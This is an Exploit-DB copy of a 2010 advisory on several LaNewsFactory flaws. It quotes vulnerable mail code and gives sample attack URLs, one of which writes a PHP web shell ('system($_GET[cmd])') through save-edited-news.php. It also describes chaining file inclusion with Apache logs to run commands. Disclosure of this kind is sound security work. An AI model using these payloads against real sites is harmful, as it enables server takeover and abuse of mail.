lanewsfactory Multiple Vulnerabilities

2010-04-23T00:00:00
ID EDB-ID:12361
Type exploitdb
Reporter Salvatore Fresta
Modified 2010-04-23T00:00:00

Description

LaNewsFactory Multiple Remote Vulnerabilities. Webapps exploit for php platform

                                        
                                            LaNewsFactory Multiple Remote Vulnerabilities
http://www.salvatorefresta.net/files/adv/LaNewsFactory%20Multiple%20Remote%20Vulnerabilities-19042010.txt

 Name              LaNewsFactory
 Vendor            Christophe Brocas
 Versions Affected <= 1.0.0

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-04-19

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 VI.   DISCLOSURE TIMELINE
 

I. ABOUT THE APPLICATION

This  is  a  very used  news manager that  not require a
database.


II. DESCRIPTION

This news managment is affected  by many  vulnerabilities
that  allows  a  guest  to  write  arbitrary files on the
system, include local files, read local files etc..


III. ANALYSIS

Summary:

 A) Anonymous email
 B) Remote File Writing
 C) Multiple Local File Inclusion
 D) Full Path Disclosure

A) Anonymous email

The mailto.php file allows a guest to send arbitrary emails.
The input is not properly sanitised:

if (ValidEmailAdress($youremail) and ValidEmailAdress($friendemail))
{
	mail ($friendemail, $display[$lang]["mailtoafriend"],"$comments\n\n".$url."print".$LNF_file_extension."?art=$newsfilename\n\n$yourname", "From: $youremail");


B) Remote File Writing

The save-edited-news.php  file  allows a guest to write a
file  on the  system.  This  vulnerability may be used to
execute remote commands on the system.


C) Multiple Local File Inclusion

There are many files that use a not sanitised input with
include PHP function. This  vulnerability  may be used to
execute remote commands by including the Apache Log file.


D) Full Path Disclosure

For  example,   print.php  file  prints  many  errors  by
including the full path of the file.  This  path  may  be
very useful for local file inclusion and other.



IV. SAMPLE CODE

A) Anonymous email

	mailto.php?friendemail=target@email.com&youremail=ano@email.com&comments=suck!
	
	
B) Remote File Writing to Remote Command Execution

	save-edited-news.php?art=news/file.php&corps=<?php system($_GET[cmd]); ?>
	
	
D) Full Path Disclosure

	print.php?art=-1.xml


V. FIX

No fix.


VIII. DISCLOSURE TIMELINE

2010-04-19 Bugs discovered
2010-04-19 Advisory released